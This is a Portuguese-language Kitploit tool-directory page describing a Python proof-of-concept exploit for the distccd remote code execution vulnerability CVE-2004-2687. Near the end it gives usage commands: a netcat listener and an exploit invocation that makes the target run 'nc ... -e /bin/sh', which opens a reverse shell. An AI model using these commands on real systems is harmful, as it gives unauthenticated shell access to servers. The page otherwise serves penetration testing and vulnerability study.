Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
distccd_rce_CVE-2004-2687 — Exploit de prova de conceito baseado em Python para a vulnerabilidade de execução remota de código distccd CVE-2004-2687, permitindo acesso não autenticado ao shell em servidores vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/h3x0v3rl0rd/distccd_rce_cve-2004-2687
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubh3x0v3rl0rd/distccd_rce_cve-2004-2687

distccd_rce_CVE-2004-2687

Exploit de prova de conceito baseado em Python para a vulnerabilidade de execução remota de código distccd CVE-2004-2687, permitindo acesso não autenticado ao shell em servidores vulneráveis.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
23há 1 anoAinda não revisado
Compartilhar

distccd_rce_CVE-2004-2687

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Atualize para Python3

Visão Geral

Este repositório contém um exploit de Prova de Conceito (PoC) para a vulnerabilidade do distccd identificada como CVE-2004-2687. A vulnerabilidade existe no daemon distccd, que faz parte do sistema de compilação distribuída distcc para C/C++. Quando configurado de forma inadequada, o distccd permite que atacantes remotos executem comandos arbitrários no servidor sem qualquer autenticação.

Detalhes da Vulnerabilidade

O distcc é projetado para distribuir tarefas de compilação entre várias máquinas, a fim de acelerar o processo de construção. No entanto, se o daemon distccd não estiver devidamente protegido, ele expõe uma vulnerabilidade de execução remota de código (RCE). Isso ocorre porque o daemon escuta em uma porta de rede e aceita comandos de qualquer cliente, permitindo que eles executem comandos shell no servidor como o usuário que executa o daemon.

A vulnerabilidade recebeu o identificador CVE-2004-2687 e afeta as versões do distccd anteriores a 3.1. Quando explorada, um atacante pode obter acesso shell à máquina vulnerável, levando a um potencial comprometimento de todo o sistema.

root@kitploit:~
	nc -lvp 4444
	python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"

Vulnerabilidade :

image

Exploit :

image

Baixar ferramenta